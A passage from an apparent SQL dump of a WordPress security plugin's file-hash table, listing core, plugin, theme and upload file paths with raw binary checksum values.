�nuF','',0,'?'),('w,�a\Z\r)�wb#�','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Handler/StreamHandler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r��:�<4V#B','&�Po�k\'H��@�<�Wv�F/Z<�N(�','',0,'?'),('w/��3�%� �8�_��E','wp-content/uploads/2019/10/plumber-150x150.jpg',0,'��I�\r�����V��','��I�\r�����V��','Z!g��W��}wIoY@d&\"4�\r��\"z\rG�8','',0,'?'),('w5�n3$���LZ��2`7','wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-home-page-watcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��H�TE�̐2fۣ�','4�d\r����t�/�,���,����>�0�W]','',0,'?'),('wDI��-E��I�l�','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-multiple.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T��%�a;B3>|CX��','B;,�y��_�:�$������E5��B0��\0','',0,'?'),('wDZ/�I�E�20y ק','wp-content/plugins/wp-cerber/assets/flags/pf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S����\'�>�Gx��:�',' �5�C����}Z��;�T��q,H-�˻�','',0,'?'),('wZ��kFD9�����h','wp-includes/blocks/site-tagline/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����� ��B�mqӮ','��a;���$�Z���u}+Z5����@A�\r','',0,'?'),('we��j�Z�q�I�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/City.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�,�����Eڎ�;','5+�S�sY>%�r9�7�5[I�=�`<2M��','',0,'?'),('wi��#�]��F���S�','wp-content/plugins/wordpress-seo/src/integrations/third-party/the-events-calendar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x��@���B{tZ','8������,|숂~��.�Q���ew�%�2$d','',0,'?'),('w~c�9G]N�aF��\0�','wp-content/plugins/redirection/locale/json/redirection-ja.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']��&-z�|��C','�JIcV�%o�^S��Q�W������/�~�','',0,'?'),('w��g���r�{֚�^','wp-content/plugins/wordpress-seo/vendor/composer/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]_�#D���\0��','\Z ��ے�%�4~N�~Gh!b��:w��Ɍ��\'','',0,'?'),('w�ž�!�J�La/+�','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Pool.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����hW!���0�R]�','7-�9���W{VUΨ<�-�\">j�(LT��\"�','',0,'?'),('w���L��0���]r.','wp-includes/images/crystal/code.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�1�����1�9',';�67����\r�!����x\Z_@H��&C��-��','',0,'?'),('w�@�I�e��R�f�7��','wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/symmetric.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����h�R���','���=�mH��/�\ne��C��3�u58�','',0,'?'),('w��`M��>�{���','wp-admin/includes/noop.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X�qj����\Z!�\r:�','dˎJ��������P[\n=��Qc����P�','',0,'?'),('w���ֶz�P��u�T�','wp-content/plugins/wordpress-seo/admin/config-ui/class-configuration-options-adapter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&����m���t','�C#�Ts�pdNوd&C���@c�G>),t��','',0,'?'),('w�S����@��U��','wp-content/plugins/redirection/locale/redirection-fr_FR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ͻ\n懦.YU_��cӀ�','\'\nX��oXJ�g���i �I<\\\nK��R�F��\0�','',0,'?'),('wË���9/,+1��','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium_legacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�� �Z8�t\"','avxu��흶j��=�I�S��D{����!','',0,'?'),('w�+2v�)wq0�\'OG�','wp-content/plugins/wordpress-seo/src/routes/yoast-head-rest-field.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n���a����;_�{','Zi��x�aV�ݛy��_�nT�H����1�z','',0,'?'),('w��\\��A^��V�N$^','wp-content/plugins/disable-gutenberg/fonts/awesome/fontawesome-webfont.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��nq*��ZF�)2�','�&4\"\rQ�jX�mN\"��?P�o��\\��?���','',0,'?'),('w������:}V��P','wp-admin/js/common.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<5�F%����.\r��','\0:�[��4��\ZM�hoC�b��us՟S�','',0,'?'),('x G!N�$�.�d�Tb�','wp-includes/ID3/module.audio-video.flv.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�����w�I�@��',';hg�D�)\r�:n���e8c������\"�.�','',0,'?'),('xF!��e������W�','wp-content/plugins/redirection/models/regex.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_EѬf�+��]fkW ','��1٦-}��ҪμFI���9���\\<G���','',0,'?'),('x9@^6��ߑ��o��','wp-includes/images/w-logo-blue.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[N�W��_p�w�0','ޣ^Q�t�3�H�unU❻��~�\'�T2','',0,'?'),('xIH�.�9�Y��BO','wp-admin/css/colors/coffee/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!QD�h�4�����','���O��eVT`N6bqIO7�M\n���^�8','',0,'?'),('xLKx ��2��Is�!#Q','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r�U������CB\"','��)M���쩂tU��δ�Ԫ���F.�','',0,'?'),('xV�M��>�n�{O�ǟ','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-blacklist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I,0�`�-=�OxH��','Ⰱm�Wka���2��Sj�>����\"�w�<','',0,'?'),('x`�s�p�(�7$\'��','wp-content/plugins/wordpress-seo/admin/views/partial-notifications-warnings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ն���F��>','(\Z�9[�h�a����=��o�Y�^L{_A�.S','',0,'?'),('xe�˅�诹<��/eY','wp-includes/blocks/tag-cloud/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ao�U�u�g��T�;�4','�V���s��|����bPo�25�*�S�椞6�','',0,'?'),('xy�!��q�)�.ˉ\"','wp-content/plugins/wordfence/images/sort_desc_disabled.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m����͟��r�� 9','; �_�Y���t�7K��s��mC��\r����o','',0,'?'),('x�O�?Q_��r��]�','wp-content/uploads/2019/10/plumbing-350x220.jpg',0,'5��ψ���b�(L�','5��ψ���b�(L�','��m8*�p�9E�R\ri�|R�j4&�ɣ[<��','',0,'?'),('x�^m�]̲�/��L4vU','wp-admin/includes/revision.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�є:�$\rন�)�','�v�Ӏ��r�D:9��3�9mU���mh:�lV','',0,'?'),('x��\\��\0v�`�%�]�','wp-content/plugins/redirection/fileio/apache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*G8��0��/�}��','�ٰ#�2�ꔜ(�Gr�o*�h_VlU�XM','',0,'?'),('x����5LC�}��','wp-content/plugins/wordpress-seo/admin/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','EЛ��O0��c���Ag3','�� 蚠{�c�FJ�w��!}a���9�','',0,'?'),('x��n�8I�Y���1�','wp-content/themes/twentynineteen/inc/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���6��7������p','����X��:*�N�Y�/���\"�d�[Ï��','',0,'?'),('x�l��=GL�@�1�IQ','wp-content/uploads/2019/09/planning-permission-garden-300x225.jpg',0,'���\0r��ʭz��','���\0r��ʭz��','�ՠ�.Z�*��G �N}���_ӥR ����i�','',0,'?'),('x�.���X��J$�ɮܹ','wp-includes/blocks/pullquote/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c���\0��}̘8���*','��b��(����0�V�����\n��k��lY���','',0,'?'),('x덂��@}Y��i�+','wp-includes/js/tinymce/plugins/tabfocus/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ώ�@�/@M�m�N�','�xM��\'Ȥ��=�ڷ�?$�S,Fy���֥','',0,'?'),('x�z#�]�r�u?0��O�','wp-includes/sodium_compat/namespaced/Core/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h���g`ɸ:ڕ^','���F/Q�H\0���^l 0�BΓի6S@Ph�','',0,'?'),('y���1��-�/fIנ','wp-content/plugins/wordfence/lib/Diff/Renderer/Html/Array.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��09\r�ɘa�d���P','F*O�Оq^�l��gz���,I?�b�R�]K�ֳE','',0,'?'),('y&E�zݜ�Z�yڲ','wp-includes/class-wp-recovery-mode-key-service.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9A��l���%<�C','����{�Tg�}�E��^�[�Fe�.�','',0,'?'),('y52�m�\0�l�\"�e','wp-includes/js/dist/priority-queue.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��R��\Z��Z��F��3\0','��Xio���=�c�-���qL��~�r�d�0','',0,'?'),('yA��0���Xz(��\'\\','wp-admin/js/widgets/media-gallery-widget.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#D�\"5.�(���5��','Pe�Z\nG=�<����B3��\n\r٘�<��ׅ��','',0,'?'),('yO�\0yj�eB\nVp��','wp-includes/sodium_compat/src/Core/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E��ƀk�vk��\r','���iiLM�P���4�ިO_!���iN �','',0,'?'),('ymKrBi1�\Ze�F��p\\','wp-content/uploads/2016/11/roofs-300x169.jpg',0,'���awkf<f�6�:[�','���awkf<f�6�:[�','�i��6OxbT�S\n$N8�e=�.t��^-','',0,'?'),('yuh��m\06��2�6�v\0','wp-content/plugins/wordpress-seo/src/helpers/image-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7�z:Kb�y&5�*i','��1�3�-�� ��[\'�|�\"��\0�n�Q�+6���','',0,'?'),('y��\n�,\nC�|[i','wp-includes/customize/class-wp-customize-selective-refresh.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[��`�`b�=E�\"','䖌B�%�\'�M�9F���4\n��4yө�\n','',0,'?'),('y��������i��8','wp-content/uploads/2019/08/renting2-updraft-pre-smush-original.jpg',0,'^Vwy@Qw�ngv|�n{','^Vwy@Qw�ngv|�n{','G:��o�6�\"�¥���\rW@{�� �]\nW','',0,'?'),('y��{�\\b�a\'�\\','wp-includes/customize/class-wp-sidebar-block-editor-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]m��L-D���+Zٕ','�o,bL�nB��Qv�-|q�d���\'B=�X&','',0,'?'),('y�xM���@�O�','wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-smartcrawl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��t@��N����j��^E','�~���/��|kc��gj�#�㠻�0��t�c','',0,'?'),('y��������R?kZB�','wp-content/plugins/wordpress-seo/inc/options/class-wpseo-option-titles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+xU��>��E�qީA�0','Sz(�r:�\0��;�o��F .\r<���9�E�G','',0,'?'),('y���E�a��:�[\0','wp-includes/class.wp-dependencies.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�n��}%�3t�','���B-�[i<��6J�Zu*3��Q�q�xL\0','',0,'?'),('y�&�eW�K6�]��H�','wp-content/plugins/wp-cerber/assets/flags/br.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ն=Xo�#','�l�YC��#�fݽ�\Z\'4�� fk>�χO��}','',0,'?'),('y�5�7!�g��� ','wp-content/themes/twentynineteen/js/customize-preview.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uܥ�֭�=�\\�M��U�','��0]L\0��W����=,�[��}|����\\�','',0,'?'),('y�p���\'RP�0','wp-content/plugins/wordpress-seo/admin/config-ui/fields/class-field-multiple-authors.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d��x�a�u��0r=','Ʊg��\r��Ҵum:�*պ.A���)G�Ñ','',0,'?'),('y�3���2/��[X#��F','wp-includes/blocks/query-title/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���zӫ��Z��$R�','����`�M�_�]�D�bf{�Bhn��','',0,'?'),('y���G�\\`��MR�','wp-admin/network/site-new.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���~Z�v릵��\'��','T�1�*nN�\Z�\r�?�ZU��a:��ܺr���','',0,'?'),('y���\0Lz�㶵�و','wp-includes/blocks/group/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l��օ�5ރ��|�q�','۞\Z���}=eJ]�0]��uCG�.�0NA�\Z','',0,'?'),('y�\"�jY\0u���<c','wp-content/plugins/wp-cerber/changelog.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t*�(g���H8泤','a�f��J����i#� ���v�桃1b��Y','',0,'?'),('y�\0�Jҳ����~�w','wp-content/uploads/2016/11/White-Modern-Kitchen-updraft-pre-smush-original.jpg',0,'G����9%�m�z��e�','G����9%�m�z��e�','3PN��E�\r�7D#�Ir~��\0�b��tZLŐ{','',0,'?'),('z\rR2nLS�k��','wp-content/plugins/redirection/api/api-import.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J: K�N�\n���','�2�4�Qg�����8g����p�Ɏ','',0,'?'),('zx�\rQx��Fޅ��2','wp-content/plugins/wordfence/css/wf-colorbox.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PX)p!��N8�j��','o�t0�\r�P2��N�����i���K��u���','',0,'?'),('zɐ���@�/�/@�','wp-content/plugins/wordfence/views/waf/options-group-advanced-firewall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�58O�O�}��s','����$9�dS>;�:���\n��ad_�X��[F','',0,'?'),('z.[�D8�R�','wp-includes/js/codemirror/jsonlint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I)fy��kT�+��<՟','�$D;;����0���F�~p��GғF�ˁ��','',0,'?'),('z;j2WD�6��[�V','wp-admin/js/accordion.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' -)���@O(���b�','��1�iLOU�m\r[X���00�\\�E�B���-','',0,'?'),('z@���z�[P�ѐ�','wp-content/plugins/wp-cerber/assets/flags/rw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&Ľ�C��6���ޯ�L�','y\n<P�^5z��g�\\\"�f\\�S�p8��1s','',0,'?'),('z]��Őx�\'!*[,��','wp-content/plugins/wp-cerber/assets/flags/ar.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���IauKc� ���io1','R�2�$��͗�[��G`�d�;TC\0ԙ���U','',0,'?'),('zl,sW�6�uD�Wѵ�','wp-content/plugins/wordpress-seo/src/helpers/robots-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%����t<��[gz','9��M_�͐������@�:�)90�]��g_tX','',0,'?'),('zn^\0�k�ܦ{�&��','wp-content/plugins/wp-cerber/languages/wp-cerber-nb_NO.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����P�����\"c�\\','v�+��>���v!�ɐ��O�pm�i','',0,'?'),('zo��ܲ�~��b','wp-content/plugins/wordfence/lib/wfAdminNoticeQueue.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�5��uNi��!�z','����#���ɛ!w�c�w�}6���~A���','',0,'?'),('zt�S}�.���b��kg�','wp-content/plugins/redirection/locale/redirection-el.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r(xD�� \n�\0a���','���LG,$f~���(P~wj�9�ա(����','',0,'?'),('z|�����L��F�D�','wp-includes/css/dist/edit-widgets/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��1G�O�|iE�B','�\Z�Ed@�Z��|�.�+�u�n�eł�','',0,'?'),('z��sDF��wPþ,�','wp-content/plugins/redirection/locale/redirection-ja.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �Th�I<3��0U�','��Jh�\"Z��#Q,�a��.����\0�Y','',0,'?'),('z��:�0�ʉ�4�P��O','wp-content/plugins/wordpress-seo/js/dist/languages/sk-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F��k�[�����]�','�L�B?�W��ڟp�$0`Ék5���KPd�\\','',0,'?'),('z�LM�����`6�-','wp-content/plugins/wordpress-seo/src/config/migrations/20200728095334_AddIndexesForProminentWordsOnIndexables.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-��w��P� F.!�\Z','U������x��\\�0f��Vy����o��','',0,'?'),('z�m�SA�}I���)','wp-includes/sodium_compat/namespaced/Compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A�i�k�/��j\rn�3','1�\'����ջ.�O��}5�Afi�~��>�:}s','',0,'?'),('z�2]�w\'��=\"�-�4','wp-includes/blocks/query-pagination-previous/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>*��ģ�x� #�','\\����𝌳䡠R�֜�t��c5\r�^���DaR','',0,'?'),('z�5�*\ZADZCk��j��','wp-content/plugins/wordfence/images/icons/magnifier.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���uO�{:qcV��\'','� at��v��dQ��0(�Ij�Ɩ�O��$e(*','',0,'?'),('z���L��5 g5�Ď�','wp-includes/sodium_compat/src/Core/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�r�I���bw\'-7�','�u�S�{��<���n\r߅+-#�;�᷃QЮ','',0,'?'),('z�����;F��k��','wp-content/uploads/2016/11/taupe-kitchen-cabinets-contemporary-with-range-in-island-wine-and-bottle-openers-350x220.jpg',0,'��\"��Z�X��o�','��\"��Z�X��o�','�U\n�{@��(�$�d�3,^6����;�hXROC�','',0,'?'),('z����8 L�{��q','wp-content/plugins/wordfence/lib/menu_scanner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/صtb�a���0�\'2','J��*e*��0��qCs\'GO.~r�1�OmS��4','',0,'?'),('z��Q<��\'��U~�R\\','wp-includes/css/wp-embed-template.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���n��t�{�hK�','/�O��h\nσ��G�����E]<<�u���bh2','',0,'?'),('z����JX�w{!\rF���','wp-admin/includes/class-wp-upgrader-skins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q\"������ґ�-щ','.��7j3?̶��·?��2U�E�.�G�W','',0,'?'),('zۗ�`�瀃��1\0','wp-includes/js/jquery/ui/effect.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j�Bs*C���x�','|�Bh��z��+�{nց.n�s�E\\I��\0���','',0,'?'),('z�W�sW5ʈ� )��','wp-includes/css/dist/customize-widgets/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r��Oy`33ɿ_�','��g,4h�uq������ZO��ذ�O��\Z�c','',0,'?'),('z������W�z�','wp-content/plugins/wp-cerber/languages/wp-cerber-ru_RU.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`)�2������Ͷ��',',$7���;����][���dHl@�B0�7�o','',0,'?'),('{\n���R�o��R=\'g�','wp-admin/js/widgets/custom-html-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���eF���֍�EO�^','������I��|Mu�a6�i\0��J_�n��k�{','',0,'?'),('{\n�Į8h�Z�9],$','wp-content/uploads/2019/09/water-sustainability-150x150.jpg',0,'\rUس��ձ��W� 7','\rUس��ձ��W� 7','s�;�!\"�L~�^����W����k��#�','',0,'?'),('{��=2���?l�����','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-captcha.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��pg���!��/�՝','�, X6�!צ6�H�%�=98�`�y��nj�-','',0,'?'),('{N���2�Q�u��= �','wp-admin/network/theme-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}��b~�@�u�ˏJ��','��\Z��dc\\fu�5���=q�אEc���I�a�','',0,'?'),('{�B���<�qU����','wp-content/plugins/wordpress-seo/languages/wordpress-seo-nl_NL.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ɮ��H����lP','�6�5XE���E�Y8��&l|��6_/���XY�~','',0,'?'),('{���;�XFQ�\n�:','wp-content/plugins/wordpress-seo/css/dist/yoast-components-1690-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t�s���j�*f�j','����)�N\nl%m(b�./��dOE��ڢ�-i�L','',0,'?'),('{=ا�{��\no}]v�','wp-content/plugins/wp-cerber/assets/flags/sa.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]pڌE�YYz�ٶ','�����0��{A�3�HX�~��z��\nT�','',0,'?'),('{[�/����ڑ��','wp-content/plugins/wordfence/views/dashboard/option-howgetips.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h�����(v1�','�\Z�le�knj\'=��|C���,\0��MlDG����','',0,'?'),('{]��2]$D�^sq','wp-content/plugins/wordpress-seo/admin/tracking/class-tracking-default-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','¿�2�q���v�','-M.4;?}��H,��j�y}%֣���g�;���','',0,'?'),('{a�{4�;��Moز','wp-includes/block-template-utils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Wά�d��٬\r���','�n-j��\\zzT��89�fKo.q9�Xw�\0�Z�','',0,'?'),('{o��/�o�h9�a��','wp-content/plugins/wp-cerber/assets/flags/ve.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g���^ٔwX�c�','Z��\\[.�M���q��2]l�AL��Jf���C','',0,'?'),('{p!1��Z]KMC�*!','wp-content/plugins/redirection/locale/redirection-es_ES.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v�BA�AM�3nN���',']����Zz�R�Q�u����\r���Z�p}�x�','',0,'?'),('{t�E~��P�A�1��','wp-admin/js/tags.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>.Sc~\r\r��!s��(#�','T��*/�2�i3�j��p%�\0��n�x[5\'��','',0,'?'),('{y\"�ҵ��ݩ�{���','wp-admin/includes/class-walker-category-checklist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ǯ ��f/,d%eU�','�Q��;����\Z�4o_�{����\nϠ�q\"Q�r','',0,'?'),('{�j�ɏ|n� ^<�WH�','wp-includes/css/dist/nux/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ۗ�0a��==ڈ','����R�~��?�t���Ot(4�������� ','',0,'?'),('{�)�4e4p:�fW�','wp-includes/js/jquery/jquery.query.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';�Xz�ǰ��wC','�u�g^���+��i��m���G\rF�x�i�X�','',0,'?'),('{�4�O;{\'$2dț�O','wp-content/themes/twentytwenty/inc/starter-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y)G�.�\'','5H?%��)�JzI<Y�6�WJ2�I���d�','',0,'?'),('{�1�9�+sh���','wp-content/plugins/wp-cerber/assets/flags/gp.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��CG_t?���9�rK','��hd0)m�3�a�ͱQ�D�V�����}�','',0,'?'),('{��\n�rI���','wp-admin/widgets-form.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�Cu�/����E','�ˎ��<!̋ j���]]���i �6�','',0,'?'),('{�RC��\Z�.*\"�Q','wp-includes/feed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4Y�G�~\"7W\r��Uz','*~(Y�n+s2���`�x�2TȾ)@��L���','',0,'?'),('{�\r�-��}�^��','wp-includes/images/smilies/frownie.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q���������','r�~�Dzo�h߱�����ػ\">E�+�Ke�','',0,'?'),('{�;�13�84��/','wp-content/plugins/wordpress-seo/admin/ajax.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`r����AJ��\Z+',' d���|b�6d�b��\"p��\\7ߍ��g�)�','',0,'?'),('{���?���\r��\n\'','wp-admin/images/imgedit-icons.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�\\2���}�G�i;O','T�N�~��-�@��N��̞V�\\��(u$��','',0,'?'),('{��+���&������','wp-content/themes/vega/assets/js/parallax.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@G��ޯ̀B�S��','^����^3I��h��ܑ���ULq^���E=','',0,'?'),('|j��x7�(Q}�0�\'�','wp-admin/css/list-tables.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2;��z�)ca��yH','>����|�5HZ/C�~�!H�(߲��>�','',0,'?'),('|���L��F8�5<ZM','wp-includes/blocks/gallery/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ؼ������K1]X�','16�%D�FI�[&i�1���f֦F��i��6��','',0,'?'),('|\rl?D_�m�d� Y�x','wp-content/themes/twentytwentyone/assets/js/dark-mode-toggler.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&D�_F#�I!���','�R��g����[>{��e�\n�ژx�1��R�','',0,'?'),('|-����z��-�','wp-admin/export-personal-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xh�v�iy��.��','C~S����|��8R�wK@�_�J��m�','',0,'?'),('|/ڒ�\0[*4��x��','wp-includes/js/admin-bar.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r�c����@p�','t���bIld�\n�Lb�x+�ϔ�j䶪,�J\0\r$2','',0,'?'),('|4,��\r\"ɱ�؊��o','wp-content/plugins/redirection/api/api-redirect.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�=t���DJ�Jk�)�','���?ʷ��f1�l!\\tU-ҭ-��+�ε','',0,'?'),('|N!�;x�N&�g��m�','wp-admin/js/widgets/media-image-widget.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G9�Fm�qQ��','J�6�%V��\"�\rK�yɳ�h���8�N�����F','',0,'?'),('|l�+F��#ڟ�����','wp-includes/class-wp-user-request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�?�v��\\����$','z����.t(���C�o��� ���tV�','',0,'?'),('|m�1\0��z�^�m�{�','wp-includes/css/dist/customize-widgets/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7!h�^9�@(�TסG','sl_��cژ�_O�I�O8�4;��2GP�w�ت','',0,'?'),('|�3�=#zJ;�$�O�jh','wp-content/plugins/redirection/matches/user-agent.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Y]��E�J�','5\"��y`�\0��byY5�mv\'��B\'\\�','',0,'?'),('|�� �4�x�\\��M�n','wp-admin/js/code-editor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��D&fAД��E��~','{���h;[�5��0` Vz��Kd�����^,h�','',0,'?'),('|�OG�}ͱ��u�x~�}','wp-content/uploads/2021/08/building-768815_1920-768x512.jpg',0,'�ʗ5\r��������nW','�ʗ5\r��������nW','A阪���}_�P���������\\ra!l8��','',0,'?'),('|���4�)�=3}&Ϥ�','wp-content/plugins/wordpress-seo/src/conditionals/get-request-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�al �$G��Lr��jq','�:sT����)�0�P*�<�j5\"�w&�cRb�','',0,'?'),('|�s�k��[�c���Й','wp-content/plugins/wordpress-seo/inc/options/class-wpseo-option-social.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z��Z�f�o��|�TQ�','ҕN 